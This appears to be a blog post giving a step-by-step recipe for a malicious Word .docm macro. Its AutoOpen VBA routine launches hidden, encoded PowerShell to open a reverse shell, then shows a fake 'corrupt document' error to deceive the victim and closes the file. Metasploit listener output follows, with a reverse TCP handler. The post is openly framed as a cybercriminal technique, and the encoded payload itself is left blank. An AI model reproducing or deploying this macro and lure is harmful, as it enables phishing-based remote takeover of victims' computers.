Docm Macro Beacon Loader: From Cybercriminal Perspective

Goal:

  • Simulate an advanced adversary using macros with .docm documents and PowerShell to create a beacon-type payload using unicorn.py (thanks to TrustedSec!)
  • It is similar to Locky, Cerber, Carbanak payloads minus PowerShell

For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it AutoOpen and paste the generated code into that. This will automatically run. Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted. You should get a shell through powershell injection after that.

The full macro script is as follows:

Sub AutoOpen()
Dim x
x = "-window hidden -EncodedCommand " "
Shell ("powershell.exe " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub


Attacker’s View:

  • msfconsole -r unicorn.rn
  • [*] Exploit running as background job.
  • [*] Started reverse TCP handler on 192.168.0.196:443 
  • [*] Starting the payload handler…
  • [*] Encoded stage with x86/shikata_ga_nai

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s